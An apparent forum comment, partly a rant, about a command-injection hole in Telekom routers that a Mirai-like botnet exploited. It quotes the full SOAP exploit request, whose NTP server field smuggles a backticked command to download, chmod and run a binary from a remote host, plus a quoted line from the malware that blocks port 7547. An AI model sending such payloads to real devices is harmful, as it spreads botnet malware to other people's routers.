What a joke. There needs to be criminal liability for this. No authentication, authorization, identification? Data passed straight to exec() and fucking backticks are executed?
Jeez, I hate Telekom routers. They're unstable pieces of crap (except the rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT support, these dungheap devices caused most of the problems.
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...
next version step Mirai?
https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...